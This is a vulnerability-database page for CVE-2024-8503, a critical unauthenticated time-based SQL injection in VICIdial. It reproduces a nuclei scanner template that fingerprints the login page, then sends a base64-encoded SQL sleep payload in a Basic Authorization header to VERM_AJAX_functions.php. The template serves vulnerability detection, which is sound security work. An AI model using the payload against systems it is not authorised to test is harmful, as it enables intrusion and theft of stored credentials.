Lucene search
K

VICIdial - SQL Injection

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 76 Views

VICIdial - SQL Injection. Unauthenticated attack, time-based SQL injection vuln to enumerate database records, plaintext credentials stored by default

Related
Refs
Code
id: CVE-2024-8503

info:
  name: VICIdial - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to enumerate database records and extract plaintext credentials stored by VICIdial, leading to complete system compromise and unauthorized access to the call center platform.
  remediation: |
    Apply security patches for VICIdial to address the SQL injection vulnerability in VERM_AJAX_functions.php and implement proper credential encryption.
  reference:
    - https://en.0day.today/exploit/39746
    - https://github.com/Chocapikk/CVE-2024-8504
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8503
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8503
    cwe-id: CWE-89
    epss-score: 0.80023
    epss-percentile: 0.99569
  metadata:
    verified: true
    max-request: 2
    vendor: vicidial
    product: vicidial
    fofa-query: icon_hash="1375401192"
  tags: time-based-sqli,cve,cve2024,vicidial,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /vicidial/welcome.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Agent Login","Timeclock","Administration")'
          - 'contains(content_type,"text/html")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type,"text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220389241ce3f22c1b4012c846146ad7d802ba335b701178518d1bedb9571e0c50102210098c7fbf7f229b0f26c5aff010f32cd42b5e29e049df531209f98d15bff0ae8c6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8
EPSS0.80023
SSVC
76